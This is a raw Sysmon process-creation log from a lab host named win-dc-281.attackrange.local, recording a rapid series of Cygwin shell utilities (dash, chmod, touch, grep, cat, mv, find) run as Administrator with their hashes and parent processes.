14:55:58.374{A8622C2F-53FE-6078-C60A-00000000AE01}6652C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053362Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.366{A8622C2F-53FE-6078-C50A-00000000AE01}3156C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-C40A-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053352Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.358{A8622C2F-53FE-6078-C40A-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053342Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.350{A8622C2F-53FE-6078-C30A-00000000AE01}6852C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FE-6078-C20A-00000000AE01}6592C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.343{A8622C2F-53FE-6078-C20A-00000000AE01}6592C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.334{A8622C2F-53FE-6078-C10A-00000000AE01}5964C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-C00A-00000000AE01}6240C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053312Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.327{A8622C2F-53FE-6078-C00A-00000000AE01}6240C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053302Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.319{A8622C2F-53FE-6078-BF0A-00000000AE01}6336C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-BE0A-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.311{A8622C2F-53FE-6078-BE0A-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053280Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.303{A8622C2F-53FE-6078-BD0A-00000000AE01}4424C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FE-6078-BB0A-00000000AE01}5804C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.295{A8622C2F-53FE-6078-BC0A-00000000AE01}6076C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-BA0A-00000000AE01}4288C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053260Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.295{A8622C2F-53FE-6078-BB0A-00000000AE01}5804C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.287{A8622C2F-53FE-6078-BA0A-00000000AE01}4288C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053238Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.279{A8622C2F-53FE-6078-B90A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053226Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.271{A8622C2F-53FE-6078-B80A-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-B70A-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053216Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.264{A8622C2F-53FE-6078-B70A-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053204Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.255{A8622C2F-53FE-6078-B60A-00000000AE01}6808C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-B50A-00000000AE01}5852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053194Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.247{A8622C2F-53FE-6078-B50A-00000000AE01}5852C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.231{A8622C2F-53FE-6078-B40A-00000000AE01}6884C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53FE-6078-B30A-00000000AE01}4696C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053174Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.224{A8622C2F-53FE-6078-B30A-00000000AE01}4696C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053162Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.216{A8622C2F-53FE-6078-B20A-00000000AE01}7016C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-B10A-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053152Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.209{A8622C2F-53FE-6078-B10A-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.200{A8622C2F-53FE-6078-B00A-00000000AE01}4604C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FE-6078-AF0A-00000000AE01}5224C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.193{A8622C2F-53FE-6078-AF0A-00000000AE01}5224C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.185{A8622C2F-53FE-6078-AE0A-00000000AE01}2484C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-AD0A-00000000AE01}6580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053112Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.177{A8622C2F-53FE-6078-AD0A-00000000AE01}6580C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053102Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.170{A8622C2F-53FE-6078-AC0A-00000000AE01}6332C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-AB0A-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053092Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.162{A8622C2F-53FE-6078-AB0A-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053080Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.154{A8622C2F-53FE-6078-AA0A-00000000AE01}3208C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FE-6078-A80A-00000000AE01}6076C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.146{A8622C2F-53FE-6078-A90A-00000000AE01}6084C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-A70A-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053060Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.146{A8622C2F-53FE-6078-A80A-00000000AE01}6076C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-A60A-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.138{A8622C2F-53FE-6078-A70A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FE-6078-A60A-00000000AE01}5800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053038Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.131{A8622C2F-53FE-6078-A60A-00000000AE01}5800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053026Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.123{A8622C2F-53FE-6078-A50A-00000000AE01}1408C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FE-6078-A40A-00000000AE01}4344C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053016Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.115{A8622C2F-53FE-6078-A40A-00000000AE01}4344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000053004Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.106{A8622C2F-53FE-6078-A30A-00000000AE01}5396C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FE-6078-A20A-00000000AE01}1536C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052994Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.099{A8622C2F-53FE-6078-A20A-00000000AE01}1536C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.091{A8622C2F-53FE-6078-A10A-00000000AE01}6268C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FE-6078-A00A-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052974Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.084{A8622C2F-53FE-6078-A00A-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052964Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.075{A8622C2F-53FE-6078-9F0A-00000000AE01}5332C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-9E0A-00000000AE01}4384C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052954Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.068{A8622C2F-53FE-6078-9E0A-00000000AE01}4384C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052944Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.059{A8622C2F-53FE-6078-9D0A-00000000AE01}1628C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FE-6078-9C0A-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052934Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 